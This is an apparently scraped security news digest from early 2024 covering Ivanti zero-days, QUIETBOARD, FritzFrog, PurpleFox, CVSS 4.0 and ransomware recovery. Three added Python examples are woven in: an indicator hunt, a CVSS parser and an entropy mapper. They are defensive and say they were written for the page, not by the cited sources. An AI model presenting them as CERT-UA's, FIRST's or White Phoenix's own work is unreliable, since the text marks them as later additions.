            Autosummary: Among those is a backdoor named QUIETBOARD, “capable of arbitrary command execution, clipboard content manipulation for crypto currency theft, USB/removable drive infection, screenshotting, system information gathering, and communication with the C2 server,” as well “the capability of modular expansion and running independent Python based code/modules.”


            Why the Right Metrics Matter When it Comes to Vulnerability Management

            exploits industry
            2024-02-01 https://thehackernews.com/2024/02/why-right-metrics-matter-when-it-comes.html
            How’s your vulnerability management program doing? Is it effective? A success? Let’s be honest, without the right metrics or analytics, how can you tell how well you’re doing, progressing, or if you’re getting ROI? If you’re not measuring, how do you know it’s working? And even if you are measuring, faulty reporting or focusing on the wrong metrics can create blind spots and make it harder to

            Autosummary: This article will help you identify and define the key metrics that you need to track the state of your vulnerability management program, the progress you’ve made, so you can create audit-ready reports that: prove your security posture, meet vulnerability remediation SLAs and benchmarks, help pass audits and compliance, demonstrate ROI on security tools, simplify risk analysis, and prioritize resource allocation. Why you need to measure vulnerability management: Metrics play a critical role in gauging the effectiveness of your vulnerability and attack surface management. Cyber hygiene, scan coverage, average time to fix, vulnerability severity, remediation rates, vulnerability exposure… the list is endless. When a new vulnerability that could critically affect your systems is identified, Intruder will automatically kick off a scan. Attack surface monitoring: This helps you see the percentage of assets that are protected across your attack surface, discovered or undiscovered. As your attack surface evolves, changes and grows over time, it’s important to monitor any changes to what’s covered and your IT environment, such as recently opened ports and services.


            Warning: New Malware Emerges in Attacks Exploiting Ivanti VPN Vulnerabilities

            exploits
            2024-02-01 https://thehackernews.com/2024/02/warning-new-malware-emerges-in-attacks.html
            Google-owned Mandiant said it identified new malware employed by a China-nexus espionage threat actor known as UNC5221 and other threat groups during post-exploitation activity targeting Ivanti Connect Secure VPN and Policy Secure devices. This includes custom web shells such as BUSHWALK, CHAINLINE, FRAMESTING, and a variant of LIGHTWIRE. "CHAINLINE is a Python web shell backdoor that is

            Autosummary: Furthermore, the attacks are characterized by the use of open-source utilities like Impacket, CrackMapExec, iodine, and Enum4linux to support post-exploitation activity on Ivanti CS appliances, including network reconnaissance, lateral movement, and data exfiltration within victim environments.


            Multiple malware used in attacks exploiting Ivanti VPN flaws

            exploits
            2024-02-01 https://securityaffairs.com/158440/apt/malware-ivanti-vpn-flaws-attacks.html
            Mandiant spotted new malware used by a China-linked threat actor UNC5221 targeting Ivanti Connect Secure VPN and Policy Secure devices. Mandiant researchers discovered new malware employed by a China-linked APT group known as UNC5221 and other threat groups targeting Ivanti Connect Secure VPN and Policy Secure devices. The attackers were observed exploiting CVE-2023-46805 and CVE-2024-21887 […]

            Autosummary: Pierluigi Paganini, February 01, 2024. Mandiant spotted new malware used by a China-linked threat actor UNC5221 targeting Ivanti Connect Secure VPN and Policy Secure devices.


            Spotify's filter fails to block explicit lyrics

            industry
            2024-02-01 https://www.bbc.co.uk/news/entertainment-arts-68126890
            Fans are shown swear words and racial slurs in dozens of songs even when explicit content is blocked.



            New Windows Event Log zero-day flaw gets unofficial patches

            exploits
            2024-02-01 https://www.bleepingcomputer.com/news/microsoft/new-windows-event-log-zero-day-flaw-gets-unofficial-patches/
            Free unofficial patches are available for a new Windows zero-day vulnerability dubbed "EventLogCrasher" that lets attackers remotely crash the Event Log service on devices within the same Windows domain. [...]

            Autosummary: Unofficial security patches for affected Windows systems. The 0patch micropatching service released unofficial patches for most affected Windows versions on Wednesday, available for free until Microsoft releases official security updates to address the zero-day bug: Windows 11 v22H2 and v23H2 (fully updated); Windows 11 v21H2 (fully updated); Windows 10 v22H2, v21H2, v21H1, v20H2, v2004, v1909, v1809 and v1803 (fully updated); Windows 7 (no ESU, ESU1, ESU2, ESU3); Windows Server 2022, 2019 and 2016 (fully updated); Windows Server 2012 and 2012 R2 (no ESU, ESU1); Windows Server 2008 R2 (no ESU, ESU1, ESU2, ESU3, ESU4). "Since this is a '0day' vulnerability with no official vendor fix available, we are providing our micropatches for free until such fix becomes available," Kolsek said.


            FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities

            exploits
            2024-02-01 https://www.helpnetsecurity.com/2024/02/01/botnet-log4shell-pwnkit/

            The FritzFrog cryptomining botnet has new potential for growth: a recently analyzed variant of the bot is exploiting the Log4Shell (CVE-2021-44228) and PwnKit (CVE-2021-4034) vulnerabilities for lateral movement and privilege escalation. The FritzFrog botnet The FritzFrog botnet, initially identified in August 2020, is a peer-to-peer (rather than centrally-controlled) botnet powered by malware written in Golang. It targets SSH servers by brute-forcing login credentials, and has managed to compromise thousands of them worldwide. “Each compromised host … More

            The post FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities appeared first on Help Net Security.

            Autosummary: The FritzFrog botnet, initially identified in August 2020, is a peer-to-peer (rather than centrally controlled) botnet powered by malware written in Golang.


            Qualys enhances CyberSecurity Asset Management to discover risky unmanaged devices

            ciber
            2024-02-01 https://www.helpnetsecurity.com/2024/02/01/qualys-cloud-agent-passive-sensor/

            Qualys is expanding Qualys CyberSecurity Asset Management (CSAM) to identify unmanaged and untrusted devices in real-time. Leveraging the Qualys Cloud Agent to continuously monitor the network, this passive discovery method complements scans, agents, and API-based discovery to build a comprehensive asset inventory, calculate the TruRisk of every asset, and eliminate risk based on business impact. 69% of organizations said they experienced at least one cyberattack resulting from an exploit of an unknown or unmanaged asset … More

            Autosummary: “In navigating intricate enterprise landscapes, real-time visibility of the entire infrastructure is difficult, and at times, appears impossible,” said Gary Bowen, director of Security Operations, Brown & Brown Insurance.


            More Android apps riddled with malware spotted on Google Play

            exploits
            2024-02-01 https://www.bleepingcomputer.com/news/security/more-android-apps-riddled-with-malware-spotted-on-google-play/
            An Android remote access trojan (RAT) known as VajraSpy was found in 12 malicious applications, six of which were available on Google Play from April 1, 2021, through September 10, 2023. [...]

            Autosummary: Those installing the apps became infected with VajraSpy, allowing the malware to steal personal data, including contacts and messages, and depending on the granted permissions, even to record their phone calls.


            PurpleFox malware infects thousands of computers in Ukraine

            exploits
            2024-02-01 https://www.bleepingcomputer.com/news/security/purplefox-malware-infects-thousands-of-computers-in-ukraine/
            The Computer Emergency Response Team in Ukraine (CERT-UA) is warning about a PurpleFox malware campaign that has infected at least 2,000 computers in the country. [...]

            Autosummary: [A-F0-9]{8} sequence, e.g., "MsBA4B6B3AApp.dll"); services added for persistence (CERT-UA). If any of the above indicates a PurpleFox infection, CERT-UA suggests either using Avast Free AV to run a "SMART" scan and remove all modules, or performing the following steps: boot from a LiveUSB or connect the infected drive to another computer, then manually delete "MsXXXXXXXXApp.dll" and ".sdb"
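One way to turn the CERT-UA file-name indicator above into a hunt is to scan a directory listing for DLLs matching Ms[A-F0-9]{8}App.dll and report any .sdb files colocated with them. The Python below is an added example written for this page, not CERT-UA's or anyone else's tooling. The directory listing is constructed, and grouping by directory and reporting colocated .sdb files are this example's own design choices: the summary does not name the .sdb file, so the hunt reports every .sdb beside a matching DLL rather than matching a specific name.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# CERT-UA's file-name indicator: "Ms" + eight upper-case hex characters + "App.dll".
# The extension is matched case-insensitively because NTFS is case-insensitive.
_PURPLEFOX_DLL = re.compile(r"^Ms[A-F0-9]{8}App\.(?i:dll)$")

# Constructed directory listing (invented for this example, not CERT-UA data).
SAMPLE_LISTING: List[str] = [
    r"C:\Windows\System32\MsBA4B6B3AApp.dll",   # matches the indicator
    r"C:\Windows\System32\Ms0BADF00DApp.DLL",   # matches; only the extension case differs
    r"C:\Windows\System32\a1b2.sdb",            # unexplained shim database beside the DLLs
    r"C:\Windows\System32\kernel32.dll",
    r"C:\Windows\System32\MsMpEng.dll",         # not eight hex characters
    r"C:\Users\Public\MsG1234567App.dll",       # 'G' is not a hex digit
    r"C:\Windows\AppPatch\sysmain.sdb",         # legitimate shim DB with no matching DLL nearby
]


def hunt_purplefox(paths: List[str]) -> List[Dict[str, object]]:
    """Report every DLL matching the indicator, with the .sdb files in the same directory."""
    by_dir: Dict[str, List[PureWindowsPath]] = {}
    for raw in paths:
        path = PureWindowsPath(raw)
        by_dir.setdefault(str(path.parent).lower(), []).append(path)

    findings: List[Dict[str, object]] = []
    for directory, entries in sorted(by_dir.items()):
        sdb_files = sorted(e.name for e in entries if e.suffix.lower() == ".sdb")
        for entry in sorted(entries, key=lambda e: e.name):
            if _PURPLEFOX_DLL.match(entry.name):
                findings.append({"dll": str(entry), "directory": directory, "sdb_files": sdb_files})
    return findings


if __name__ == "__main__":
    for finding in hunt_purplefox(SAMPLE_LISTING):
        print(f"{finding['dll']}  (colocated .sdb: {', '.join(finding['sdb_files']) or 'none'})")
```

Because the function takes a plain listing, it works equally on an offline image mounted from a LiveUSB (feed it the output of a recursive directory walk) as on a live host, which matches the offline removal route CERT-UA recommends.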


            Tax season is here, so are scammers

            financial
            2024-02-01 https://www.malwarebytes.com/blog/scams/2024/02/tax-season-is-here-so-are-scammers
            Watch out for malicious ads tricking you as you prepare to file your taxes.

            Autosummary: A search for ‘IRS support’ returns the following ad claiming to be the “IRS Support Line”. The website tied to this ad is shown with the corresponding advertiser (left), while a different website from a different advertiser is seen (right). While the pitch varies, a common scam consists of selling expensive support plans, such as in the example below, which is for the first advert seen earlier. AI-assisted taxes: AI has been all the rage in the past year or so.


            FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network

            exploits
            2024-02-01 https://thehackernews.com/2024/02/fritzfrog-returns-with-log4shell-and.html
            The threat actor behind a peer-to-peer (P2P) botnet known as FritzFrog has made a return with a new variant that leverages the Log4Shell vulnerability to propagate internally within an already compromised network. "The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible," web infrastructure and security

            Autosummary: The disclosure comes as Akamai revealed that the InfectedSlurs botnet is actively exploiting now-patched security flaws (from CVE-2024-22768 through CVE-2024-22772, and CVE-2024-23842) impacting multiple DVR device models from Hitron Systems to launch distributed denial-of-service (DDoS) attacks.


            FTC orders Blackbaud to boost security after massive data breach

            financial
            2024-02-01 https://www.bleepingcomputer.com/news/security/ftc-orders-blackbaud-to-boost-security-after-massive-data-breach/
            Blackbaud has settled with the Federal Trade Commission after being charged with poor security and reckless data retention practices, leading to a May 2020 ransomware attack and a data breach affecting millions of people. [...]

            Autosummary: The FTC's complaint alleges that the company "failed to monitor attempts by hackers to breach its networks, segment data to prevent hackers from easily accessing its networks and databases, ensure data that is no longer needed is deleted, adequately implement multifactor authentication, and test, review and assess its security controls" and "allowed employees to use default, weak, or identical passwords for their accounts."


            Does CVSS 4.0 solve the exploitability problem?

            exploits
            2024-01-31 https://www.helpnetsecurity.com/2024/01/31/cvss-4-0-scoring-system/

            The newest version of the vulnerability scoring system, CVSS 4.0, is here! After a lengthy gap since version 3 (released in 2015), version 4.0 has been officially live since November 2023. Building iteratively on version 3, there are a few differences that in theory should improve how we score, perceive and categorize vulnerabilities. What was wrong with version 3.0? Version 3.0, and CVSS in general, while being quite good at measuring the "impact" of a … More

            Autosummary: This differs from attack complexity, which has more to do with the security controls that must be overcome (e.g., ASLR for buffer overflows, WAFs, etc.) for the attack to succeed. While the attack complexity parameter sadly hasn’t changed, attack requirements introduces the prerequisite deployment and execution conditions that need to be in place for the attack to succeed – for example: a specific configuration setting of a web server, presence of a specific code dependency, etc.
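Attack Requirements (AT) appears as a metric of its own in the 4.0 vector string, next to the unchanged Attack Complexity (AC). The Python below is an added example for this page, not code from the article or from FIRST's calculator: it parses and validates a CVSS v4.0 Base vector, rejects a v3.1 vector (which has no AT metric at all), and spells out the two prerequisites the article contrasts. The allowed values follow the CVSS v4.0 specification; passing Threat, Environmental and Supplemental metrics through unvalidated is a simplification of this example.

```python
import re
from typing import Dict

# CVSS v4.0 Base metrics and their allowed values (FIRST specification, November 2023).
BASE_METRICS: Dict[str, str] = {
    "AV": "NALP",  # Attack Vector: Network, Adjacent, Local, Physical
    "AC": "LH",    # Attack Complexity: Low, High (security controls the attacker must defeat)
    "AT": "NP",    # Attack Requirements: None, Present (new in 4.0: deployment/execution preconditions)
    "PR": "NLH",   # Privileges Required: None, Low, High
    "UI": "NPA",   # User Interaction: None, Passive, Active
    "VC": "HLN", "VI": "HLN", "VA": "HLN",  # Confidentiality/Integrity/Availability, vulnerable system
    "SC": "HLN", "SI": "HLN", "SA": "HLN",  # the same three for subsequent systems
}
_METRIC = re.compile(r"^([A-Z]{1,3}):([A-Z])$")


def parse_cvss4(vector: str) -> Dict[str, str]:
    """Parse a CVSS v4.0 vector into {metric: value}, validating every Base metric.

    Threat, Environmental and Supplemental metrics are kept but not validated
    (a simplification of this example).
    """
    prefix, _, rest = vector.strip().partition("/")
    if prefix != "CVSS:4.0":
        raise ValueError(f"not a CVSS v4.0 vector (prefix {prefix!r})")
    metrics: Dict[str, str] = {}
    for part in rest.split("/"):
        match = _METRIC.match(part)
        if not match:
            raise ValueError(f"malformed metric {part!r}")
        name, value = match.groups()
        if name in metrics:
            raise ValueError(f"duplicate metric {name}")
        allowed = BASE_METRICS.get(name)
        if allowed is not None and value not in allowed:
            raise ValueError(f"{name}:{value} is not one of {'/'.join(allowed)}")
        metrics[name] = value
    missing = [name for name in BASE_METRICS if name not in metrics]
    if missing:
        raise ValueError(f"missing Base metrics: {', '.join(missing)}")
    return metrics


def is_valid_cvss4(vector: str) -> bool:
    """True if the vector parses as a complete, well-formed v4.0 Base vector."""
    try:
        parse_cvss4(vector)
    except ValueError:
        return False
    return True


def exploitability_preconditions(metrics: Dict[str, str]) -> str:
    """Spell out the two prerequisites the 4.0 Base vector now keeps apart."""
    ac = ("security controls must be defeated (AC:H)" if metrics["AC"] == "H"
          else "no security controls in the way (AC:L)")
    at = ("specific deployment or configuration conditions required (AT:P)" if metrics["AT"] == "P"
          else "no deployment preconditions (AT:N)")
    return f"{ac}; {at}"


if __name__ == "__main__":
    vector = parse_cvss4("CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N")
    print(exploitability_preconditions(vector))
```

The sample vector is the interesting case the article describes: AC:L says there is no mitigation to bypass, yet AT:P says the bug only bites under a particular deployment condition, which a v3.x score could express only by inflating Attack Complexity.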


            Proactive cybersecurity: A strategic approach to cost efficiency and crisis management

            ciber
            2024-01-31 https://www.helpnetsecurity.com/2024/01/31/stephanie-hagopian-cdw-proactive-cybersecurity-strategy/

            In this Help Net Security interview, Stephanie Hagopian, VP of Security at CDW, discusses offensive strategies in the face of complex cyberattacks and the role of the zero-trust model. The conversation also covers the essential steps for a reactive cybersecurity strategy post-attack, emphasizing transparency and preparedness. Furthermore, we examine the benefits of adopting a proactive cybersecurity approach, particularly in terms of cost efficiency and crisis management, and explore the impact of offensive security testing on … More

            Autosummary: In turn, in the case of a cyberattack, companies can save organizations millions of dollars in preventing unplanned downtime, reputational costs and regulatory fines, among other costs. Furthermore, we examine the benefits of adopting a proactive cybersecurity approach, particularly in terms of cost efficiency and crisis management, and explore the impact of offensive security testing on compliance and zero-day response.


            Cybercriminals replace familiar tactics to exfiltrate sensitive data

            industry ciber
            2024-01-31 https://www.helpnetsecurity.com/2024/01/31/ransomware-attacks-changing-tactics/

            Ransomware attacks are increasing again as cybercriminals’ motivation shifts to data exfiltration, according to Delinea. The familiar tactics of crippling a company and holding it hostage have been replaced by new strategies that use stealth to exfiltrate private and sensitive data. Cybercriminals then frequently threaten to sell it to the highest bidder on the darknet or leverage it to reap a handsome cyber insurance payment. Ransomware on the rise Although not back at the levels … More

            Autosummary: Changing tactics in ransomware attacks: As their main goals changed, cybercriminals modified their tactics and moved away from using email as a preferred attack vector (down from 52% to 37%), targeting cloud (44%) and compromised applications (39%) instead.


            New Glibc Flaw Grants Attackers Root Access on Major Linux Distros

            Linux
            2024-01-31 https://thehackernews.com/2024/01/new-glibc-flaw-grants-attackers-root.html
            Malicious local attackers can obtain full root access on Linux machines by taking advantage of a newly disclosed security flaw in the GNU C library (aka glibc). Tracked as CVE-2023-6246, the heap-based buffer overflow vulnerability is rooted in glibc's __vsyslog_internal() function, which is used by syslog() and vsyslog() for system logging purposes. It's said to have been accidentally



            Brazil's Lula sacks deputy intelligence chief amid spying probe

            latam
            2024-01-31 https://www.bbc.co.uk/news/world-latin-america-68150527?at_medium=RSS&at_campaign=KARANGA
            Investigations continue into alleged illegal spying when his predecessor Jair Bolsonaro was in power.



            Free ransomware recovery tool White Phoenix now has a web version

            exploits ransomware
            2024-01-31 https://www.helpnetsecurity.com/2024/01/31/free-ransomware-recovery-tool-white-phoenix-web-version/

            White Phoenix is a free ransomware recovery tool for situations where files are encrypted with intermittent encryption. It was tested on BlackCat/ALPHV Ransomware, Play Ransomware, Qilin/Agenda Ransomware, BianLian Ransomware, and DarkBit. Intermittent encryption occurs when ransomware chooses not to encrypt every part of each file but instead encrypts sections, frequently in blocks of a set size or just the start of the targeted files. Consumer concerns about ransomware attacks: Consumers are keeping a pulse on … More

            Autosummary: So, companies should ensure they have strong protective and detective measures in place, such as effective endpoint protection, robust email and web filtering for malicious content, mature security awareness programs, immutable backups, and constant monitoring for suspicious activity.
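Intermittent encryption, as described above, leaves large stretches of each file untouched, and recovery depends on locating those stretches. The Python below is an added example for this page, not White Phoenix's code or algorithm: it maps a file block by block using Shannon entropy, treats high-entropy blocks as encrypted, and returns the byte ranges that look recoverable. The 4 KiB block size, the 7.5 bits-per-byte threshold and the sample "document" are all constructed for the illustration. The caveat a practitioner needs: natively compressed formats (ZIP, JPEG, many PDF streams) are high-entropy before any ransomware touches them, so for those a structure-aware parser has to replace the entropy heuristic.

```python
import math
import random
from typing import List, Tuple

BLOCK_SIZE = 4096          # assumed block size; real families use a variety of sizes
ENCRYPTED_THRESHOLD = 7.5  # bits per byte; random data sits near 8.0, English text near 4-5


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def classify_blocks(data: bytes, block_size: int = BLOCK_SIZE,
                    threshold: float = ENCRYPTED_THRESHOLD) -> List[Tuple[int, int, bool]]:
    """Return (start, end, looks_encrypted) for each block; end is exclusive."""
    blocks: List[Tuple[int, int, bool]] = []
    for start in range(0, len(data), block_size):
        end = min(start + block_size, len(data))
        blocks.append((start, end, shannon_entropy(data[start:end]) >= threshold))
    return blocks


def recoverable_ranges(data: bytes, block_size: int = BLOCK_SIZE,
                       threshold: float = ENCRYPTED_THRESHOLD) -> List[Tuple[int, int]]:
    """Merge consecutive low-entropy blocks into the byte ranges that are still readable."""
    ranges: List[Tuple[int, int]] = []
    for start, end, encrypted in classify_blocks(data, block_size, threshold):
        if encrypted:
            continue
        if ranges and ranges[-1][1] == start:
            ranges[-1] = (ranges[-1][0], end)   # extend the current plaintext run
        else:
            ranges.append((start, end))
    return ranges


def build_sample_file(n_blocks: int = 10, encrypted_blocks: Tuple[int, ...] = (0, 1, 5),
                      seed: int = 1234) -> bytes:
    """Construct a plaintext 'document' and overwrite a few blocks with random bytes,
    simulating a family that encrypts the file header plus an interior stripe."""
    rng = random.Random(seed)
    line = b"Quarterly report: revenue grew while costs stayed flat. "
    size = n_blocks * BLOCK_SIZE
    buf = bytearray((line * (size // len(line) + 1))[:size])
    for blk in encrypted_blocks:
        buf[blk * BLOCK_SIZE:(blk + 1) * BLOCK_SIZE] = bytes(rng.getrandbits(8) for _ in range(BLOCK_SIZE))
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample_file()
    for start, end, encrypted in classify_blocks(sample):
        print(f"{start:7d}-{end:7d}: {'encrypted' if encrypted else 'plaintext'}")
    print("recoverable:", recoverable_ranges(sample))
```

On the constructed file the map shows the first two blocks and block five as encrypted and returns two recoverable ranges; for a real format the next step is to carve the objects that fall wholly inside those ranges, which is the part that is format-specific.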


            The SEC Won't Let CISOs Be: Understanding New SaaS Cybersecurity Rules

            ciber
            2024-01-31 https://thehackernews.com/2024/01/the-sec-wont-let-cisos-be-understanding.html
            The SEC isn’t giving SaaS a free pass. Applicable public companies, known as “registrants,” are now subject to cyber incident disclosure and cybersecurity readiness requirements for data stored in SaaS systems, along with the 3rd and 4th party apps connected to them. The new cybersecurity mandates make no distinction between data exposed in a breach that was stored on-premise, in the

            Autosummary: As the SEC is tasked with protecting investors and maintaining "fair, orderly, and efficient markets," regulating registrants' SaaS and SaaS-to-SaaS connections falls within the agency's purview. With SSPM, you can monitor configurations and permissions across all SaaS apps, along with understanding the permissions and reach of SaaS-to-SaaS connections, including connected AI tools.


            Italian Businesses Hit by Weaponized USBs Spreading Cryptojacking Malware

            exploits
            2024-01-31 https://thehackernews.com/2024/01/italian-businesses-hit-by-weaponized.html
            A financially motivated threat actor known as UNC4990 is leveraging weaponized USB devices as an initial infection vector to target organizations in Italy. Google-owned Mandiant said the attacks single out multiple industries, including health, transportation, construction, and logistics. "UNC4990 operations generally involve widespread USB infection followed by the deployment of the

            Autosummary: QUIETBOARD, on the other hand, is a Python-based backdoor with a wide range of features that allow it to execute arbitrary commands, alter crypto wallet addresses copied to the clipboard to redirect fund transfers to wallets under the attackers' control, propagate the malware to removable drives, take screenshots, and gather system information.


            Hackers Exploiting Ivanti VPN Flaws to Deploy KrustyLoader Malware

            exploits
            2024-01-31 https://thehackernews.com/2024/01/chinese-hackers-exploiting-critical-vpn.html
            A pair of recently disclosed zero-day flaws in Ivanti Connect Secure (ICS) virtual private network (VPN) devices have been exploited to deliver a Rust-based payload called KrustyLoader that's used to drop the open-source Sliver adversary simulation tool. The security vulnerabilities, tracked as CVE-2023-46805 (CVSS score: 8.2) and CVE-2024-21887 (CVSS score: 9.1), could be abused



            ICS and OT threat predictions for 2024

            industry
            2024-01-31 https://ics-cert.kaspersky.com/publications/ics-and-ot-threat-predictions-for-2024/
            Most of the described trends have been observed before. However, some of them have reached a critical mass of creeping changes, which could lead to a qualitative shift in the threat landscape.



            Johnson Controls says ransomware attack cost $27 million, data stolen

            exploits ransomware
            2024-01-31 https://www.bleepingcomputer.com/news/security/johnson-controls-says-ransomware-attack-cost-27-million-data-stolen/
            Johnson Controls International has confirmed that a September 2023 ransomware attack cost the company $27 million in expenses and led to a data breach after hackers stole corporate data. [...]



            Ivanti warns of new Connect Secure zero-day exploited in attacks

            exploits
            2024-01-31 https://www.bleepingcomputer.com/news/security/ivanti-warns-of-new-connect-secure-zero-day-exploited-in-attacks/
            Today, Ivanti warned of two more vulnerabilities impacting Connect Secure, Policy Secure, and ZTA gateways, one of them a zero-day bug already under active exploitation. [...]

            Autosummary: Patches for two more actively exploited zero-days: The company also released patches today for two other zero-days disclosed in early January— an authentication bypass (CVE-2023-46805) and a command injection (CVE-2024-21887)—chained in widespread attacks to deploy malware on vulnerable ICS, IPS, and ZTA gateways since January 11.


            VikingCloud THOR AI offers real-time interactive analytics

            industry
            2024-01-31 https://www.helpnetsecurity.com/2024/01/31/vikingcloud-thor-ai/

            VikingCloud announced THOR AI (Threat Hunting and Orchestrated Response), a generative AI-powered cybersecurity chatbot. The new complimentary cyber defense tool is designed to assist companies of all sizes find more vulnerabilities faster – before they become disruptive threats to their business. THOR AI is built on two recently filed patent-pending innovations for (1) THOR AI’s algorithms based on VikingCloud’s cybersecurity and compliance dataset, and (2) persona-based communications customization. The company currently has 28 granted patents. … More

            Autosummary: Proprietary models will accurately identify the level of cybersecurity expertise of individual users, from non-existent to CISO-level capabilities – making the solution highly adoptable, easy to use, and effective.


            Alert: Ivanti Discloses 2 New Zero-Day Flaws, One Under Active Exploitation

            exploits
            2024-01-31 https://thehackernews.com/2024/01/alert-ivanti-discloses-2-new-zero-day.html
            Ivanti is alerting of two new high-severity flaws in its Connect Secure and Policy Secure products, one of which is said to have come under targeted exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-21888 (CVSS score: 8.8) - A privilege escalation vulnerability in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows



            Telegram Marketplaces Fuel Phishing Attacks with Easy-to-Use Kits and Malware

            financial exploits
            2024-01-31 https://thehackernews.com/2024/01/telegram-marketplaces-fuel-phishing.html
            Cybersecurity researchers are calling attention to the "democratization" of the phishing ecosystem owing to the emergence of Telegram as an epicenter for cybercrime, enabling threat actors to mount a mass attack for as little as $230. "This messaging app has transformed into a bustling hub where seasoned cybercriminals and newcomers alike exchange illicit tools and insights creating a dark and

            Autosummary: "These leads can be incredibly specific, tailored for any region, niche, demographic, specific company customers, and more," the researchers said.


            Ivanti warns of a new actively exploited zero-day

            exploits
            2024-01-31 https://securityaffairs.com/158403/hacking/ivanti-actively-exploited-zero-day-cve-2024-21893.html
            Ivanti warns of two new vulnerabilities in its Connect Secure and Policy Secure products, one of which is actively exploited in the wild. Ivanti is warning of two new high-severity vulnerabilities in its Connect Secure and Policy Secure solutions, tracked as CVE-2024-21888 (CVSS score: 8.8) and CVE-2024-21893 (CVSS score: 8.2). The software company also warned that […]

            Autosummary: In early January 2024, software firm Ivanti reported that threat actors were exploiting two other zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Connect Secure (ICS) and Policy Secure to remotely execute arbitrary commands on targeted gateways.


            Threat actors exploit Ivanti VPN bugs to deploy KrustyLoader Malware

            exploits
            2024-01-31 https://securityaffairs.com/158393/malware/ivanti-connect-secure-vpn-deliver-krustyloader.html
            Threat actors are exploiting recently disclosed zero-day flaws in Ivanti Connect Secure (ICS) VPN devices to deliver KrustyLoader. In early January 2024, software firm Ivanti reported that threat actors were exploiting two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Connect Secure (ICS) and Policy Secure to remotely execute arbitrary commands on targeted gateways. Researchers from cybersecurity firm Synacktiv published […]

            Autosummary: The list of targets includes multiple Fortune 500 companies operating in various industry sectors, such as: global government and military departments; national telecommunications companies; defense contractors; technology firms; banking, finance, and accounting institutions; worldwide consulting services; aerospace, aviation, and engineering entities. After being publicly disclosed, multiple threat actors started exploiting these vulnerabilities to deploy XMRig cryptocurrency miners and Rust-based malware.


            Exploit released for Android local elevation flaw impacting 7 OEMs

            exploits
            2024-01-31 https://www.bleepingcomputer.com/news/security/exploit-released-for-android-local-elevation-flaw-impacting-7-oems/
            A proof-of-concept (PoC) exploit for a local privilege elevation flaw impacting at least seven Android original equipment manufacturers (OEMs) is now publicly available on GitHub. However, as the exploit requires local access, its release will mostly be helpful to researchers. [...]

            Autosummary: CVE-2023-45779 impacts many OEMs, including ASUS (tested on Zenfone 9), Microsoft (Surface Duo 2), Nokia (G50), Nothing (Phone 2), VIVO (X90 Pro), Lenovo (Tab M10 Plus), and Fairphone (5).


            CISA warns of patched iPhone kernel bug now exploited in attacks

            exploits Linux
            2024-01-31 https://www.bleepingcomputer.com/news/security/cisa-warns-of-patched-iphone-kernel-bug-now-exploited-in-attacks/
            CISA warned today that a patched kernel security flaw affecting Apple iPhones, Macs, TVs, and watches is now being actively exploited in attacks. [...]



            FBI disrupts Chinese botnet by wiping malware from infected routers

            exploits
            2024-01-31 https://www.bleepingcomputer.com/news/security/fbi-disrupts-chinese-botnet-by-wiping-malware-from-infected-routers/
            The FBI has disrupted the KV Botnet used by Chinese Volt Typhoon state hackers to evade detection during attacks targeting U.S. critical infrastructure. [...]

            Autosummary: "The Volt Typhoon malware enabled China to hide, among other things, pre-operational reconnaissance and network exploitation against critical infrastructure like our communications, energy, transportation, and water sectors—steps China was taking, in other words, to find and prepare to destroy or degrade the civilian critical infrastructure that keeps us safe and prosperous," said FBI Director Christopher Wray.


            Experian Fraud Protect enables automotive dealers to detect and prevent fraud

            industry
            2024-01-31 https://www.helpnetsecurity.com/2024/01/31/experian-fraud-protect/

            With more of the vehicle buying journey shifting online and vehicle prices remaining at elevated levels, fraudsters are targeting the automotive industry at an increasing rate. To address the rising threat, Experian launched Fraud Protect, a web-based application that helps automotive dealers detect and prevent fraud while maintaining a positive shopping experience for the consumer. According to a recent Experian report, nearly 70% of businesses reported that fraud losses have increased in recent years. Among … More



            A zero-day vulnerability (and PoC) to blind defenses relying on Windows event logs

            exploits
            2024-01-31 https://www.helpnetsecurity.com/2024/01/31/windows-event-log-vulnerability/

            A zero-day vulnerability that, when triggered, could crash the Windows Event Log service on all supported (and some legacy) versions of Windows could spell trouble for enterprise defenders. Discovered by a security researcher named Florian and reported to Microsoft, the vulnerability is yet to be patched. In the meantime, the researcher has gotten the go-ahead from the company to publish a PoC exploit. The vulnerability and the PoC: Florian found the bug while working on … More

            Autosummary: “During the service downtime, any detection mechanisms ingesting Windows logs will be blind, allowing the attacker to take time for further attacks – password brute-forcing, exploiting remote services with unreliable exploits that often crash them, or running every attacker’s favorite whoami – without being noticed,” Kolsek pointed out. Micropatches have been provided for various releases of Windows 11, 10 and 7, and Windows Server 2022, 2019, 2016, 2012, and 2008.


            Vade uses generative AI to enhance spear-phishing detection

            financial
            2024-01-31 https://www.helpnetsecurity.com/2024/01/31/vade-spear-phishing-detection/

            Vade announced that it has pioneered a new method that improves the confidence of its spear-phishing detection engine. The enhancement, designed to combat advanced threats including those produced by generative AI, leverages threat samples created by artificial technology and human sources. The new method trains Vade’s spear-phishing algorithms on a unique combination of traditional and artificially generated spear-phishing emails. Vade has confirmed that the enhancement increases the confidence of detection across seven spear phishing classifiers, … More

            Autosummary: In the US, W2 fraud accounts for the largest improvement, seeing a 50% increase in confidence, followed by banking fraud at 30%.


            MotoGP's Argentina Grand Prix cancelled due to the "current circumstances" in country

            latam government
            2024-01-31 https://www.bbc.co.uk/sport/motorsport/68158096?at_medium=RSS&at_campaign=KARANGA
            MotoGP's Argentina Grand Prix is cancelled due to the "current circumstances" in the country.



            Hackers push USB malware payloads via news, media hosting sites

            exploits
            2024-01-31 https://www.bleepingcomputer.com/news/security/hackers-push-usb-malware-payloads-via-news-media-hosting-sites/
